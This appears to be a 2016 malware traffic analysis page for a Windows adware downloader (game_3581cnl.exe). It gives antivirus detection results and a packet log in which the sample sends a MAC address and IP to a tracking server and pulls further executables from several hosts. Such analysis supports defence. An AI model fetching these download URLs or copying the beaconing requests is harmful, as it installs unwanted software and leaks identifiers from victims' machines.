game_3481cn1.exe Malware Trojan Adware Downloader Dropper PPD Traffic Analysis PCAP file download

Download Attachments

  • 1 pcap game358
    Date added: October 26, 2016 5:32 am Added by: admin File size: 1 MB Downloads: 92
SHA256: 7548963754494b54a1d8b71b59e32c8b92b2e49c88dc90a3e299e45fe222dbd2
File name: game_3581cnl.exe
Detection ratio: 37 / 56
Analysis date: 2016-10-26 21:23:29 UTC
Engine           Detection                              Update
AVware           Trojan.Win32.Generic!BT                20161026
Ad-Aware         Adware.GenericKD.3602650               20161026
AegisLab         Troj.Generickd!c                       20161026
AhnLab-V3        Adware/Win32.Agent.N2118869544         20161026
Antiy-AVL        Trojan/Win32.PackedNsisMod.a           20161026
Arcabit          Adware.Generic.D36F8DA                 20161026
Avast            Win32:Malware-gen                      20161026
Avira (no cloud) APPL/Yantaia.sgj                       20161026
Baidu            Multi.Threats.InArchive                20161026
BitDefender      Adware.GenericKD.3602650               20161026
CAT-QuickHeal    Pua.Agent                              20161026
ClamAV           Win.Trojan.691128-1                    20161026
Cyren            W32/Trojan.AQCD-2701                   20161026

2016-10-25 23:32:35.987961 IP 192.168.1.102.61091 > 115.238.246.174.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /game_3581cnl.exe HTTP/1.1
E..M..@……..fs……P……. P…fc..GET /game_3581cnl.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down2.869v.com
Connection: Keep-Alive

2016-10-25 23:32:36.113830 IP 192.168.1.102.53365 > 75.75.76.76.53: 941+ A? down2.869v.com. (32)
E..<    ……….fKKLL.u.5.(l…………..down2.869v.com…..

E..(D.@….i…f.4U….P.H%..x..P…

2016-10-25 23:34:59.949703 IP 192.168.1.102.61097 > 122.225.107.67.80: Flags [P.], seq 0:175, ack 1, win 64240, length 175: HTTP: GET /route.php?package=inter&class=status&function=getinfo HTTP/1.1
E…|.@……..fz.kC…P..%…..P…….GET /route.php?package=inter&class=status&function=getinfo HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: ht.sulang.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 23:35:00.157484 IP 192.168.1.102.61097 > 122.225.107.67.80: Flags [P.], seq 0:175, ack 1, win 64240, length 175: HTTP: GET /route.php?package=inter&class=status&function=getinfo HTTP/1.1
E…|.@……..fz.kC…P..%…..P…….GET /route.php?package=inter&class=status&function=getinfo HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: ht.sulang.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 23:35:00.349997 IP 192.168.1.102.61097 > 122.225.107.67.80: Flags [.], ack 1, win 64240, length 0
E..(|.@……..fz.kC…P..&}….P…(………
2016-10-25 23:35:00.350398 IP 192.168.1.102.61097 > 122.225.107.67.80: Flags [.], ack 233, win 64009, length 0
E..(|.@……..fz.kC…P..&}…pP..     (………

E..(|`@… ?…f…….P.k..p…P..<“[……..
2016-10-25 23:35:01.112744 IP 192.168.1.102.61098 > 14.18.142.16.80: Flags [P.], seq 0:139, ack 1, win 65340, length 139: HTTP: GET /73.212.156.169 HTTP/1.1
E…|a@……..f…….P.k..p…P..<….GET /73.212.156.169 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: freeapi.ipip.net
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 23:35:01.523366 IP 192.168.1.102.61098 > 14.18.142.16.80: Flags [.], ack 243, win 65098, length 0
E..(|b@… =…f…….P.k..p…P..J!………
2016-10-25 23:35:01.711142 IP 192.168.1.102.61099 > 122.225.107.67.80: Flags [S], seq 2577945320, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4|.@……..fz.kC…P..R……. ..P…………..

E..(}.@……..fz.kC…P..R…8.P…    ………
2016-10-25 23:35:02.115588 IP 192.168.1.102.61099 > 122.225.107.67.80: Flags [P.], seq 0:291, ack 1, win 256, length 291: HTTP: POST /route.php HTTP/1.1
E..K}.@….x…fz.kC…P..R…8.P…….POST /route.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ht.sulang.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache

package=inter&class=int_nsis&function=int&configname=xiaoxiong35&city=Y29tY2FzdC5jb20iXQ==

2016-10-25 23:35:45.867298 IP 192.168.1.102.61115 > 122.225.107.67.80: Flags [P.], seq 0:289, ack 1, win 256, length 289: HTTP: GET /route.php?package=count&class=limit_count&function=count&type=3&mac=00-0C-29-18-4A-91&ip=73.212.156.169&value=MSM0OSM5NiM2NSM5IzgyIzgjNiM3NQ==&hash=b0132f07a9b962b94213669bc1a96606 HTTP/1.1
E..I}.@….^…fz.kC…P……..P…P…GET /route.php?package=count&class=limit_count&function=count&type=3&mac=00-0C-29-18-4A-91&ip=73.212.156.169&value=MSM0OSM5NiM2NSM5IzgyIzgjNiM3NQ==&hash=b0132f07a9b962b94213669bc1a96606 HTTP/1.1
User-Agent: Mozi11a
Host: ht.sulang.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 23:36:06.278399 IP 192.168.1.102.61125 > 220.243.237.154.80: Flags [P.], seq 0:240, ack 1, win 256, length 240: HTTP: GET /ks3_f6b5da76dfb6764259f38c1ff7983a8c/48_48.ico HTTP/1.1
E…64@…7….f…….P…:..8EP….d..GET /ks3_f6b5da76dfb6764259f38c1ff7983a8c/48_48.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: img1.pcfg.cache.wps.cn
Connection: Keep-Alive

2016-10-25 23:36:07.016355 IP 192.168.1.102.60592 > 75.75.75.75.53: 62329+ A? iynus.net. (27)
E..7……._…fKKKK…5.#fu.y………..iynus.net…..
2016-10-25 23:36:07.897362 IP 192.168.1.102.61126 > 117.52.31.226.80: Flags [S], seq 4288073650, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

E..(K.@…X….fu4…..P……..P…<………
2016-10-25 23:36:08.149814 IP 192.168.1.102.61126 > 117.52.31.226.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /~test/09u8h76f/65fg67n HTTP/1.1
E..NK.@…V….fu4…..P……..P…%…GET /~test/09u8h76f/65fg67n HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: iynus.net
Connection: Keep-Alive

2016-10-25 23:36:09.664561 IP 192.168.1.102.61127 > 121.31.22.151.80: Flags [P.], seq 0:230, ack 1, win 256, length 230: HTTP: GET /cn/static/swf/gm/ldfhy_24953_2649111.exe HTTP/1.1
E…..@……..fy……P.V..(`.6P…^…GET /cn/static/swf/gm/ldfhy_24953_2649111.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wd.shunfeigame.com
Connection: Keep-Alive


2016-10-25 23:36:16.400215 IP 192.168.1.102.61131 > 115.159.15.54.80: Flags [P.], seq 0:745, ack 1, win 258, length 745: HTTP: POST http://www.xy.com/lander/lanyuenew HTTP/1.1
E…F.@…l….fs..6…P.X1.3!H.P…j…POST http://www.xy.com/lander/lanyuenew HTTP/1.1
Host: www.xy.com
Connection: keep-alive
Content-Length: 413
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

adkey=24953&guid=FCEE48BA5BD741FDA82B04DC2745DDBB&agent_id=287&cplaceid=1088&installtime=2016-10-25&iswb=0&pprocess=game_3581cnl[1].exe&installparam=UnR4cDAmUTAnI1x7ZmF0eXlBfHhwMCZRMCcjRXRncHthRWd6dnBmZlt0eHAwJlEwJyNGcGFgZVt0eHAwJlEwJyNEXFEwJlEwJyNDcGdmfHp7MCZRMCcjWFRWMCZRJSUwJlQlVjAmVCcsMCZUJC0wJlQhVDAmVCwkMCcjXEUwJlEkLCcwJ1AkIy0wJ1AmJzAnUCQmJzAnI1pGMCZRWHx2Z3pmenNhPkJ8e3F6YmY+TUUwJyNcZlx7YXBne3BhV3RnMCZRJQ==

E..(F.@…n….fs..6…P….X..KP………….
2016-10-25 23:36:18.479703 IP 192.168.1.102.61132 > 115.159.15.54.80: Flags [P.], seq 0:361, ack 1, win 64240, length 361: HTTP: GET /lander/lanyuenew?adkey=24953&guid=FCEE48BA5BD741FDA82B04DC2745DDBB&agent_id=287&cplaceid=1088&installtime=2016-10-25&logintime=2016-10-25&runcount=0&iswb=0 HTTP/1.1
E…F.@…m….fs..6…P….X..KP…….GET /lander/lanyuenew?adkey=24953&guid=FCEE48BA5BD741FDA82B04DC2745DDBB&agent_id=287&cplaceid=1088&installtime=2016-10-25&logintime=2016-10-25&runcount=0&iswb=0 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: www.xy.com
Connection: Keep-Alive

2016-10-25 23:36:18.509832 IP 192.168.1.102.61133 > 115.231.153.8.80: Flags [S], seq 1441225526, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..47C@……..fs……PU.[6…… ……………..

E..(7D@……..fs……PU.[79-.JP…Z”……..
2016-10-25 23:36:18.819638 IP 192.168.1.102.61133 > 115.231.153.8.80: Flags [P.], seq 0:212, ack 1, win 256, length 212: HTTP: GET /YouXiHe/setup_yxs_kltj.exe HTTP/1.1
E…7E@……..fs……PU.[79-.JP…….GET /YouXiHe/setup_yxs_kltj.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: box64.uuuo.com
Connection: Keep-Alive
